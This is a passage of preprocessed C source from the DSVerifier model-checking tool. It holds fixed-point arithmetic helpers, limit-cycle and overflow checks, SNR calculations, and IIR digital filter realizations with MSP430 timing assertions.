shiftLboth(float zfIn, float zf[], fxp_t zIn, fxp_t z[], int N) { int i; fxp_t zOut; float zfOut; zOut = z[0]; zfOut = zf[0]; for (i = 0; i < N - 1; i++) { z[i] = z[i + 1]; zf[i] = zf[i + 1]; } z[N - 1] = zIn; zf[N - 1] = zfIn; } void shiftRboth(float zfIn, float zf[], fxp_t zIn, fxp_t z[], int N) { int i; fxp_t zOut; float zfOut; zOut = z[N - 1]; zfOut = zf[N - 1]; for (i = N - 1; i > 0; i--) { z[i] = z[i - 1]; zf[i] = zf[i - 1]; } z[0] = zIn; zf[0] = zfIn; } int order(int Na, int Nb) { return Na > Nb ? Na - 1 : Nb - 1; } void fxp_check_limit_cycle(fxp_t y[], int y_size){ fxp_t reference = y[y_size - 1]; int idx = 0; int window_size = 1; for(idx = (y_size-2); idx >= 0; idx--){ if (y[idx] != reference){ window_size++; }else{ break; } } __DSVERIFIER_assume(window_size != y_size && window_size != 1); printf("window_size %d\n", window_size); int desired_elements = 2 * window_size; int found_elements = 0; for(idx = (y_size-1); idx >= 0; idx--){ if (idx > (y_size-window_size-1)){ printf("%.0f == %.0f\n", y[idx], y[idx-window_size]); int cmp_idx = idx - window_size; if ((cmp_idx > 0) && (y[idx] == y[idx-window_size])){ found_elements = found_elements + 2; }else{ break; } } } __DSVERIFIER_assume(found_elements > 0); printf("desired_elements %d\n", desired_elements); printf("found_elements %d\n", found_elements); __DSVERIFIER_assume(found_elements == desired_elements); __DSVERIFIER_assert(0); } void fxp_check_persistent_limit_cycle(fxp_t * y, int y_size){ int idy = 0; int count_same = 0; int window_size = 0; fxp_t reference = y[0]; for(idy = 0; idy < y_size; idy++){ if (y[idy] != reference){ window_size++; } else if (window_size != 0){ break; } else { count_same++; } } window_size += count_same; __DSVERIFIER_assume(window_size > 1 && window_size <= y_size/2); fxp_t lco_elements[window_size]; for(idy = 0; idy < y_size; idy++){ if (idy < window_size){ lco_elements[idy] = y[idy]; } } idy = 0; int lco_idy = 0; _Bool is_persistent = 0; while (idy < y_size){ if(y[idy++] == lco_elements[lco_idy++]){ is_persistent = 1; }else{ is_persistent = 0; break; } if (lco_idy == window_size){ lco_idy = 0; } } __DSVERIFIER_assert(is_persistent == 0); } void fxp_check_oscillations(fxp_t y[] , int y_size){ __DSVERIFIER_assume((y[0] != y[y_size - 1]) && (y[y_size - 1] != y[y_size - 2])); int window_timer = 0; int window_count = 0; int i, j; for (i = 2; i < y_size; i++){ int window_size = i; for(j=0; j<y_size; j++){ if (window_timer > window_size){ window_timer = 0; window_count = 0; } int window_index = j + window_size; if (window_index < y_size){ if (y[j] == y[window_index]){ window_count++; __DSVERIFIER_assert(!(window_count == window_size)); } }else{ break; } window_timer++; } } } int fxp_ln(int x) { int t, y; y = 0xa65af; if (x < 0x00008000) x <<= 16, y -= 0xb1721; if (x < 0x00800000) x <<= 8, y -= 0x58b91; if (x < 0x08000000) x <<= 4, y -= 0x2c5c8; if (x < 0x20000000) x <<= 2, y -= 0x162e4; if (x < 0x40000000) x <<= 1, y -= 0x0b172; t = x + (x >> 1); if ((t & 0x80000000) == 0) x = t, y -= 0x067cd; t = x + (x >> 2); if ((t & 0x80000000) == 0) x = t, y -= 0x03920; t = x + (x >> 3); if ((t & 0x80000000) == 0) x = t, y -= 0x01e27; t = x + (x >> 4); if ((t & 0x80000000) == 0) x = t, y -= 0x00f85; t = x + (x >> 5); if ((t & 0x80000000) == 0) x = t, y -= 0x007e1; t = x + (x >> 6); if ((t & 0x80000000) == 0) x = t, y -= 0x003f8; t = x + (x >> 7); if ((t & 0x80000000) == 0) x = t, y -= 0x001fe; x = 0x80000000 - x; y -= x >> 15; return y; } double fxp_log10_low(double x) { int xint = (int) (x * 65536.0 + 0.5); int lnum = fxp_ln(xint); int lden = fxp_ln(655360); return ((double) lnum / (double) lden); } double fxp_log10(double x) { if (x > 32767.0) { if (x > 1073676289.0) { x = x / 1073676289.0; return fxp_log10_low(x) + 9.030873362; } x = x / 32767.0; return fxp_log10_low(x) + 4.515436681; } return fxp_log10_low(x); } float snrVariance(float s[], float n[], int blksz) { int i; double sm = 0, nm = 0, sv = 0, nv = 0, snr; for (i = 0; i < blksz; i++) { sm += s[i]; nm += n[i]; } sm /= blksz; nm /= blksz; for (i = 0; i < blksz; i++) { sv += (s[i] - sm) * (s[i] - sm); nv += (n[i] - nm) * (n[i] - nm); } if (nv != 0.0f) { # 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ((void) sizeof (( # 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" sv >= nv # 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" sv >= nv # 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ; else __assert_fail ( # 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" "sv >= nv" # 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 373, __extension__ __PRETTY_FUNCTION__); })) # 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" ; snr = sv / nv; return snr; } else { return 9999.9f; } } float snrPower(float s[], float n[], int blksz) { int i; double sv = 0, nv = 0, snr; for (i = 0; i < blksz; i++) { sv += s[i] * s[i]; nv += n[i] * n[i]; } if (nv != 0.0f) { # 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ((void) sizeof (( # 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" sv >= nv # 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" sv >= nv # 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ; else __assert_fail ( # 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" "sv >= nv" # 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 394, __extension__ __PRETTY_FUNCTION__); })) # 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" ; snr = sv / nv; return snr; } else { return 9999.9f; } } float snrPoint(float s[], float n[], int blksz) { int i; double ratio = 0, power = 0; for (i = 0; i < blksz; i++) { if(n[i] == 0) continue; ratio = s[i] / n[i]; if(ratio > 150.0f || ratio < -150.0f) continue; power = ratio * ratio; # 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ((void) sizeof (( # 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" power >= 1.0f # 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" power >= 1.0f # 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ; else __assert_fail ( # 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" "power >= 1.0f" # 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 412, __extension__ __PRETTY_FUNCTION__); })) # 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" ; } return 9999.9f; } unsigned long next = 1; int rand(void) { next = next*1103515245 + 12345; return (unsigned int)(next/65536) % 32768; } void srand(unsigned int seed) { next = seed; } float iirIIOutTime(float w[], float x, float a[], float b[], int Na, int Nb) { int timer1 = 0; float *a_ptr, *b_ptr, *w_ptr; float sum = 0; a_ptr = &a[1]; b_ptr = &b[0]; w_ptr = &w[1]; int k, j; timer1 += 71; for (j = 1; j < Na; j++) { w[0] -= *a_ptr++ * *w_ptr++; timer1 += 54; } w[0] += x; w_ptr = &w[0]; for (k = 0; k < Nb; k++) { sum += *b_ptr++ * *w_ptr++; timer1 += 46; } timer1 += 38; # 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ((void) sizeof (( # 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" (double)timer1*1 / 16000000 <= (double)1 / 100 # 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" (double)timer1*1 / 16000000 <= (double)1 / 100 # 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ; else __assert_fail ( # 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" "(double)timer1*CYCLE <= (double)DEADLINE" # 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 450, __extension__ __PRETTY_FUNCTION__); })) # 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" ; return sum; } float iirIItOutTime(float w[], float x, float a[], float b[], int Na, int Nb) { int timer1 = 0; float *a_ptr, *b_ptr; float yout = 0; a_ptr = &a[1]; b_ptr = &b[0]; int Nw = Na > Nb ? Na : Nb; yout = (*b_ptr++ * x) + w[0]; int j; timer1 += 105; for (j = 0; j < Nw - 1; j++) { w[j] = w[j + 1]; if (j < Na - 1) { w[j] -= *a_ptr++ * yout; timer1 += 41; } if (j < Nb - 1) { w[j] += *b_ptr++ * x; timer1 += 38; } timer1 += 54; } timer1 += 7; # 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ((void) sizeof (( # 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" (double)timer1*1 / 16000000 <= (double)1 / 100 # 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" (double)timer1*1 / 16000000 <= (double)1 / 100 # 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ; else __assert_fail ( # 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" "(double)timer1*CYCLE <= (double)DEADLINE" # 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 477, __extension__ __PRETTY_FUNCTION__); })) # 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" ; return yout; } double iirIItOutTime_double(double w[], double x, double a[], double b[], int Na, int Nb) { int timer1 = 0; double *a_ptr, *b_ptr; double yout = 0; a_ptr = &a[1]; b_ptr = &b[0]; int Nw = Na > Nb ? Na : Nb; yout = (*b_ptr++ * x) + w[0]; int j; timer1 += 105; for (j = 0; j < Nw - 1; j++) { w[j] = w[j + 1]; if (j < Na - 1) { w[j] -= *a_ptr++ * yout; timer1 += 41; } if (j < Nb - 1) { w[j] += *b_ptr++ * x; timer1 += 38; } timer1 += 54; } timer1 += 7; # 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ((void) sizeof (( # 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" (double)timer1*1 / 16000000 <= (double)1 / 100 # 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" (double)timer1*1 / 16000000 <= (double)1 / 100 # 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 ) ; else __assert_fail ( # 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" "(double)timer1*CYCLE <= (double)DEADLINE" # 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 504, __extension__ __PRETTY_FUNCTION__); })) # 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" ; return yout; } void iirOutBoth(float yf[], float xf[], float af[], float bf[], float *sumf_ref, fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t *sum_ref, int Na, int Nb) { fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr; float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr; fxp_t sum = 0; float sumf = 0; a_ptr = &a[1]; y_ptr = &y[Na - 1]; b_ptr = &b[0]; x_ptr = &x[Nb - 1]; af_ptr = &af[1]; yf_ptr = &yf[Na - 1]; bf_ptr = &bf[0]; xf_ptr = &xf[Nb - 1]; int i, j; for (i = 0; i < Nb; i++) { sum = fxp_add(sum, fxp_mult(*b_ptr++, *x_ptr--)); sumf += *bf_ptr++ * *xf_ptr--; } for (j = 1; j < Na; j++) { sum = fxp_sub(sum, fxp_mult(*a_ptr++, *y_ptr--)); sumf -= *af_ptr++ * *yf_ptr--; } *sum_ref = sum; *sumf_ref = sumf; } fxp_t iirOutFixedL(fxp_t y[], fxp_t x[], fxp_t xin, fxp_t a[], fxp_t b[], int Na, int Nb) { fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr; fxp_t sum = 0; a_ptr = &a[Na - 1]; y_ptr = &y[1]; b_ptr = &b[Nb - 1]; x_ptr = &x[0]; int i, j; for (i = 0; i < Nb - 1; i++) { x[i] = x[i+1]; sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++)); } x[Nb - 1] = xin; sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++)); for (j = 1; j < Na - 1; j++) { sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++)); y[j] = y[j+1]; } if(Na>1) sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++)); y[Na - 1] = sum; return sum; } float iirOutFloatL(float y[], float x[], float xin, float a[], float b[], int Na, int Nb) { float *a_ptr, *y_ptr, *b_ptr, *x_ptr; float sum = 0; a_ptr = &a[Na - 1]; y_ptr = &y[1]; b_ptr = &b[Nb - 1]; x_ptr = &x[0]; int i, j; for (i = 0; i < Nb - 1; i++) { x[i] = x[i+1]; sum += *b_ptr-- * *x_ptr++; } x[Nb - 1] = xin; sum += *b_ptr-- * *x_ptr++; for (j = 1; j < Na - 1; j++) { sum -= *a_ptr-- * *y_ptr++; y[j] = y[j+1]; } if(Na>1) sum -= *a_ptr-- * *y_ptr++; y[Na - 1] = sum; return sum; } float iirOutBothL(float yf[], float xf[], float af[], float bf[], float xfin, fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t xin, int Na, int Nb) { fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr; fxp_t sum = 0; a_ptr = &a[Na - 1]; y_ptr = &y[1]; b_ptr = &b[Nb - 1]; x_ptr = &x[0]; float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr; float sumf = 0; af_ptr = &af[Na - 1]; yf_ptr = &yf[1]; bf_ptr = &bf[Nb - 1]; xf_ptr = &xf[0]; int i, j; for (i = 0; i < Nb - 1; i++) { x[i] = x[i+1]; sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++)); xf[i] = xf[i+1]; sumf += *bf_ptr-- * *xf_ptr++; } x[Nb - 1] = xin; sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++)); xf[Nb - 1] = xfin; sumf += *bf_ptr-- * *xf_ptr++; for (j = 1; j < Na - 1; j++) { sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++)); y[j] = y[j+1]; sumf -= *af_ptr-- * *yf_ptr++; yf[j] = yf[j+1]; } if(Na>1) sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++)); y[Na - 1] = sum; if(Na>1) sumf -= *af_ptr-- * *yf_ptr++; yf[Na - 1] = sumf; return fxp_to_float(sum) - sumf; } float iirOutBothL2(float yf[], float xf[], float af[], float bf[], float xfin, fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t xin, int Na, int Nb) { fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr; fxp_t sum = 0; a_ptr = &a[Na - 1]; y_ptr = &y[1]; b_ptr = &b[Nb - 1]; x_ptr = &x[0]; float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr; float sumf = 0; af_ptr = &af[Na - 1]; yf_ptr = &yf[1]; bf_ptr = &bf[Nb - 1]; xf_ptr = &xf[0]; int i=0, j=1; for (i = 0; i < Nb - 1; i++) { x[i] = x[i+1]; sum = fxp_add(sum, fxp_mult(b[Nb - 1 - i], x[i])); xf[i] = xf[i+1]; sumf += bf[Nb - 1 - i] * xf[i]; } x[Nb - 1] = xin; sum = fxp_add(sum, fxp_mult(b[Nb - 1 - i], x[i])); xf[Nb - 1] = xfin; sumf += bf[Nb - 1 - i] * xf[i]; for (j = 1; j < Na - 1; j++) { sum = fxp_sub(sum, fxp_mult(a[Na - j], y[j])); y[j] = y[j+1]; sumf -= af[Na - j] * yf[j]; yf[j] = yf[j+1]; } if(Na>1) sum = fxp_sub(sum, fxp_mult(a[Na - j], y[j])); y[Na - 1] = sum; if(Na>1) sumf -= af[Na - j] * yf[j]; yf[Na - 1] = sumf; return fxp_to_float(sum) - sumf; } # 25 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 1 # 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" extern digital_system ds; extern hardware hw; extern int generic_timer; fxp_t fxp_direct_form_1(fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], int Na, int Nb) { fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr; fxp_t sum = 0; a_ptr = &a[1]; y_ptr = &y[Na - 1]; b_ptr = &b[0]; x_ptr = &x[Nb - 1]; int i, j; for (i = 0; i < Nb; i++) { sum = fxp_add(sum, fxp_mult(*b_ptr++, *x_ptr--)); } for (j = 1; j < Na; j++) { sum = fxp_sub(sum, fxp_mult(*a_ptr++, *y_ptr--)); } fxp_verify_overflow_node(sum, "An Overflow Occurred in the node a0"); sum = fxp_div(sum,a[0]); return fxp_quantize(sum); } fxp_t fxp_direct_form_2(fxp_t w[], fxp_t x, fxp_t a[], fxp_t b[], int Na, int Nb) { fxp_t *a_ptr, *b_ptr, *w_ptr; fxp_t sum = 0; a_ptr = &a[1]; b_ptr = &b[0]; w_ptr = &w[1]; int k, j; for (j = 1; j < Na; j++) { w[0] = fxp_sub(w[0], fxp_mult(*a_ptr++, *w_ptr++)); } w[0] = fxp_add(w[0], x); w[0] = fxp_div(w[0], a[0]); fxp_verify_overflow_node(w[0], "An Overflow Occurred in the node b0"); w_ptr = &w[0]; for (k = 0; k < Nb; k++) { sum = fxp_add(sum, fxp_mult(*b_ptr++, *w_ptr++)); } return fxp_quantize(sum); } fxp_t fxp_transposed_direct_form_2(fxp_t w[], fxp_t x, fxp_t a[], fxp_t b[], int Na, int Nb) { fxp_t *a_ptr, *b_ptr; fxp_t yout = 0; a_ptr = &a[1]; b_ptr = &b[0]; int Nw = Na > Nb ? Na : Nb; yout = fxp_add(fxp_mult(*b_ptr++, x), w[0]); yout = fxp_div(yout, a[0]); int j; for (j = 0; j < Nw - 1; j++) { w[j] = w[j + 1]; if (j < Na - 1) { w[j] = fxp_sub(w[j], fxp_mult(*a_ptr++, yout)); } if (j < Nb - 1) { w[j] = fxp_add(w[j], fxp_mult(*b_ptr++, x)); } } fxp_verify_overflow_node(w[j], "An Overflow Occurred in the node a0"); return fxp_quantize(yout); } double double_direct_form_1(double y[], double x[], double a[], double b[], int Na, int Nb) { double *a_ptr, *y_ptr, *b_ptr, *x_ptr; double sum = 0; a_ptr = &a[1]; y_ptr = &y[Na - 1]; b_ptr = &b[0]; x_ptr = &x[Nb - 1]; int i, j; for (i = 0; i < Nb; i++) { sum += *b_ptr++ * *x_ptr--; } for (j = 1; j < Na; j++) { sum -= *a_ptr++ * *y_ptr--; } sum = (sum / a[0]); return sum; } double double_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) { double *a_ptr, *b_ptr, *w_ptr; double sum = 0; a_ptr = &a[1]; b_ptr = &b[0]; w_ptr = &w[1]; int k, j; for (j = 1; j < Na; j++) { w[0] -= *a_ptr++ * *w_ptr++; } w[0] += x; w[0] = w[0] / a[0]; w_ptr = &w[0]; for (k = 0; k < Nb; k++) { sum += *b_ptr++ * *w_ptr++; } return sum; } double double_transposed_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) { double *a_ptr, *b_ptr; double yout = 0; a_ptr = &a[1]; b_ptr = &b[0]; int Nw = Na > Nb ? Na : Nb; yout = (*b_ptr++ * x) + w[0]; yout = yout / a[0]; int j; for (j = 0; j < Nw - 1; j++) { w[j] = w[j + 1]; if (j < Na - 1) { w[j] -= *a_ptr++ * yout; } if (j < Nb - 1) { w[j] += *b_ptr++ * x; } } return yout; } float float_direct_form_1(float y[], float x[], float a[], float b[], int Na, int Nb) { float *a_ptr, *y_ptr, *b_ptr, *x_ptr; float sum = 0; a_ptr = &a[1]; y_ptr = &y[Na - 1]; b_ptr = &b[0]; x_ptr = &x[Nb - 1]; int i, j; for (i = 0; i < Nb; i++) { sum += *b_ptr++ * *x_ptr--; } for (j = 1; j < Na; j++) { sum -= *a_ptr++ * *y_ptr--; } sum = (sum / a[0]); return sum; } float float_direct_form_2(float w[], float x, float a[], float b[], int Na, int Nb) { float *a_ptr, *b_ptr, *w_ptr; float sum = 0; a_ptr = &a[1]; b_ptr = &b[0]; w_ptr = &w[1]; int k, j; for (j = 1; j < Na; j++) { w[0] -= *a_ptr++ * *w_ptr++; } w[0] += x; w[0] = w[0] / a[0]; w_ptr = &w[0]; for (k = 0; k < Nb; k++) { sum += *b_ptr++ * *w_ptr++; } return sum; } float float_transposed_direct_form_2(float w[], float x, float a[], float b[], int Na, int Nb) { float *a_ptr, *b_ptr; float yout = 0; a_ptr = &a[1]; b_ptr = &b[0]; int Nw = Na > Nb ? Na : Nb; yout = (*b_ptr++ * x) + w[0]; yout = yout / a[0]; int j; for (j = 0; j < Nw - 1; j++) { w[j] = w[j + 1]; if (j < Na - 1) { w[j] -= *a_ptr++ * yout; } if (j < Nb - 1) { w[j] += *b_ptr++ * x; } } return yout; } double double_direct_form_1_MSP430(double y[], double x[], double a[], double b[], int Na, int Nb){ int timer1 = 0; double *a_ptr, *y_ptr, *b_ptr, *x_ptr; double sum = 0; a_ptr = &a[1]; y_ptr = &y[Na-1]; b_ptr = &b[0]; x_ptr = &x[Nb-1]; int i, j; timer1 += 91; for (i = 0; i < Nb; i++){ sum += *b_ptr++ * *x_ptr--; timer1 += 47; } for (j = 1; j < Na; j++){ sum -= *a_ptr++ * *y_ptr--; timer1 += 57; } timer1 += 3; # 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 ((void) sizeof (( # 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" (double) timer1 * hw.cycle <= ds.sample_time # 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" (double) timer1 * hw.cycle <= ds.sample_time # 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 ) ; else __assert_fail ( # 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" "(double) timer1 * hw.cycle <= ds.sample_time" # 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 235, __extension__ __PRETTY_FUNCTION__); })) # 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" ; return sum; } double double_direct_form_2_MSP430(double w[], double x, double a[], double b[], int Na, int Nb) { int timer1 = 0; double *a_ptr, *b_ptr, *w_ptr; double sum = 0; a_ptr = &a[1]; b_ptr = &b[0]; w_ptr = &w[1]; int k, j; timer1 += 71; for (j = 1; j < Na; j++) { w[0] -= *a_ptr++ * *w_ptr++; timer1 += 54; } w[0] += x; w[0] = w[0] / a[0]; w_ptr = &w[0]; for (k = 0; k < Nb; k++) { sum += *b_ptr++ * *w_ptr++; timer1 += 46; } timer1 += 38; # 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 ((void) sizeof (( # 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" (double) timer1 * hw.cycle <= ds.sample_time # 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 ) ? 1 : 0), __extension__ ({ if ( # 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" (double) timer1 * hw.cycle <= ds.sample_time # 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 ) ; else __assert_fail ( # 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" "(double) timer1 * hw.cycle <= ds.sample_time" # 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4 , "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 262, __extension__ __PRETTY_FUNCTION__); })) # 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" ; return sum; } double double_transposed_direct_form_2_MSP430(double w[], double x, double a[], double b[], int Na, int Nb) { int timer1 = 0; double *a_ptr, *b_ptr; double yout = 0; a_ptr = &a[1]; b_ptr = &b[0]; int Nw = Na > Nb ? Na : Nb; yout = (*b_ptr++ * x) + w[0]; int j; timer1 += 105; for (j = 0; j < Nw - 1; j++) { w[j] = w[j + 1]; if (j < Na - 1) { w[j] -= *a_ptr++ * yout; timer1 += 41; } if 